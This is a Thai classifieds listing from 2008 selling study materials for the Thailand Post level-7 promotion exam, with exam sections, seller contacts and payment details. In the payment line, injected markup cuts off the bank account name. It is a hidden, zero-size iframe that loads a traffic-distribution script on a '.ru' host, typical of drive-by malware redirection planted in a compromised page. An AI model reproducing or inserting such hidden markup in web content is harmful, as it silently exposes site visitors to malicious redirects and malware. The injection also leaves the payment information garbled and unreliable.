ประกาศซื้อขายฟรี
ติวสอบไปรษณีย์ไทย เลื่อนระดับ 7

ติวสอบไปรษณีย์ไทย เลื่อนระดับ 7

ตำแหน่งระดับ 7 ทีมงานบริหาร เค้นด้วยฝีมือ ความรู้ ความสามารถ ความเข้าใจ การบริหารงาน นำพาองค์กรสู่ความสำเร็จ ผู้เข้าสอบต้องพร้อมในองค์ความรู้เหล่านี้
1. ภาคความรู้ความสามารถทั่วไป (100 คะแนน) ทดสอบความรู้ ความสามารถ และความคิดริเริ่มในการกำหนดและปรับปรุงนโยบาย แผนงาน ระบบงานและการบริหาร งาน และอื่นๆ ที่จำเป็นสำหรับตำแหน่ง รวมถึงการนำบทเรียน บทความต่างๆ ในหลักสูตร E-learning มาใช้ทดสอบในเรื่องต่างๆ โดยวิธีสอบข้อเขียนหรือวิธีอื่นได้ตามความเหมาะสม
     1.1 การบริหารงานรัฐวิสาหกิจ (สั่งงาน ประสานงาน ปกครอง บังคับบัญชา ควบคุมงาน วิเคราะห์ และสร้างความคิดในการแก้ปัญหาและวินิจฉัย สั่งการ การพัฒนา การบริหาร)
     1.2 แผนรัฐวิสาหกิจ : เกี่ยวเนื่องกับแผนพัฒนาเศรษฐกิจฯ ฉ.10, นโยบายรัฐบาล 2551
     1.3 การป้องกันการรั่วไหลของรายได้ไปรษณีย์  คณะกรรมการตรวจเงินแผ่นดิน ได้ออกระเบียบ ว่าด้วย “การกำหนดมาตรฐานการควบคุมภายใน พ.ศ.2544 ประกาศ ณ วันที่ 28 ก.ย. 2544 บังคับใช้หน่วยงานของรัฐวิสาหกิจ ฯลฯ
     1.4 ศิลปะการให้บริการ การตลาด การสื่อสาร ที่ดี ทัศนคติ ค่านิยม ผู้บริการ
     1.5 หลักเกณฑ์และแนวทางการดูแลที่ดีในรัฐวิสาหกิจ คณะรัฐมนตรีให้ความเห็น ชอบแล้วฯ กลไกสำคัญที่จะผลักดันให้มีความโปร่งใสในกิจการรัฐวิสาหกิจ กระทรวง การคลังได้มีการกำหนดให้รัฐวิสาหกิจ จัดตั้งคณะกรรมการตรวจสอบ(Audit Committee) ฯลฯ รวมถึงการควบคุมและตรวจ สอบภายในองค์กร
     1.6 การบริหารความเสี่ยง สำนักงานคณะกรรมการนโยบายรัฐวิสาหกิจ  ได้กำหนดให้ทุกรัฐวิสาหกิจจะต้องดำเนินการ  จัดทำการบริหารความเสี่ยง และนับเป็นตัวชี้วัดที่สำคัญของหน่วยงาน ทั้งนี้เพื่อต้องการที่จะส่งเสริมและผลักดันให้รัฐวิสาหกิจ  มีการบริหารความเสี่ยงที่ดี
     1.7 งบประมาณรัฐวิสาหกิจ กรอบงบประมาณของรัฐวิสาหกิจต่อคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ
     1.8 จริยธรรมและจรรยาบรรณ นักบริหาร กำกับดูแลที่ดี วิสาหกิจ คณะรัฐมนตรีให้ความเห็น ชอบแล้ว ฯ ข้อความดังกล่าวเป็นกลไกสำคัญที่จะ ผลักดันให้มีความโปร่งใสในกิจการ รัฐวิสาหกิจ กระทรวงการคลังได้มีการ กำหนดให้รัฐวิสาหกิจ จัดตั้ง คณะกรรมการตรวจ สอบ (Audit Committee) ฯลฯ รวมถึงการ ควบคุมและตรวจสอบภายในองค์กร ฯลฯ

2. ภาคความรู้ความสามารถเฉพาะตำแหน่ง  ทดสอบความรู้ ความสามารถ ความเข้าใจ และความคิดเห็นเกี่ยวกับงานในตำแหน่งตามที่กำหนด โดยวิธีสอบข้อเขียน หรือวิธีอื่นได้ตามความเหมาะสม องค์ความรู้ที่ใช้ประกอบการสอบประกอบด้วย
     2.1 คู่มือสอบ พนักงานไปรษณีย์ไทย ล.1 (1 ประวัติ กิจการ แผนงาน สินค้า หน่วยงาน น่ารู้ ที่ทำการ / 2 กฎหมายไปรษณีย์ / 3 พนักงานไปรษณีย์)
     2.2 บริหารงาน ปณท. ล.2  (ภาค 1 บริหารงาน ปณท.  /  ภาค 2 5 มาตรฐาน / ภาค 3 กฎหมายวิสาหกิจ)
     2.3 ปฏิบัติงานไปรษณีย์ไทย ล.3 (1 ไปรษณียนิเทศ Postal Directive / 2 ข้อบังคับปฏิบัติงานและ ระเบียน 135 / 3 สหภาพ. ปณ. พ.ร.บ. 2551)
     2.4 MP3 เสียง คู่มือสอบ พนักงานไปรษณีย์ไทย เล่ม 1 / บริหารงาน ปณท. เล่ม 2  / ปฏิบัติงานไปรษณีย์ไทย เล่ม 3
     2.5 ระเบียบ ปณท. ฉบับที่ 1 ว่าด้วยการพัสดุ พ.ศ. 2550 (มีผลใช้ ก.พ. 51) พร้อมแบบตัวอย่างสัญญา 156 หน้า

3. ภาคความเหมะสมกับตำแหน่ง ประเมินจากความรู้ความสามารถ ความประพฤติ ความรับผิดชอบต่อหน้าที่ ความคิดริเริ่ม ปฏิภาณไหวพริบและบุคลิกภาพ

ตำรา หลักสูตร ประกอบการสอบ เฉพาะงาน คัดกรองแล้วจากยอดฝีมือในวิชาชีพ

www.dbdmart.com/globaloccasion/
0859858946

สนใจติดต่อ :
< Globaloccasion ^ โกลเบิลอ็อคเคชั่น > ศูนย์บริการกฎหมายไทย สมบูรณ์ที่สุดในประเทศ
www.dbdmart.com/globaloccasion/
100/9 หมู่ 4 ซ.ท่าอิฐ ถ.รัตนาธิเบศร์ ต.บางรักน้อย อ.เมือง จ.นนทบุรี 11000.
โทร. 0859858946 , 08-5988-0103 , 08-7011-7626. แฟ็ก. 02-985-8848 , E-mail : tlss2008@gmail.com , niraphai_j@hotmail.com

วิธีชำระเงิน
     1) ธนาคารกรุงศรีอยุธยา นางอรุณวรรณ จันทร์ส src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">

จุดประสงค์
: ต้องการขาย
ประเภท
: สินค้าใหม่
ผู้ประกาศ
: นิรภัย จันทร์สวัสดิ์
โทรศัพท์
: 0859858946
มือถือ
: 0859880103
จังหวัด
: นนทบุรี
อัพเดทล่าสุด
: 10/9/2551 20:55:24

 โปรดอ่านคำเตือน

ข้อความที่ประกาศ และโฆษณาทั้งหมดนี้ เป็นสิ่งที่เกิดขึ้นจากผู้ชมและสมาชิก ที่เข้ามาใช้บริการ ไม่ได้เกิดจากผู้ดูแลหรือผู้จัดทำเว็บไซต์ หากผู้ชมสนใจในประกาศและโฆษณาดังกล่าว กรุณาติดต่อโดยตรงถึงผู้ที่ลงประกาศ หรือโฆษณา ด้วยตนเอง และหากเกิดความผิดพลาดใดๆ เราไม่ขอรับผิดชอบ ดังนั้นผู้ชมควรใช้วิจารณญาณก่อนการติดสินใจใดๆ เกี่ยวกับคำประกาศและโฆษณาดังกล่าวนี้
เว็บไซต์สำเร็จรูป

แสดงความคิดเห็น

Related Classifieds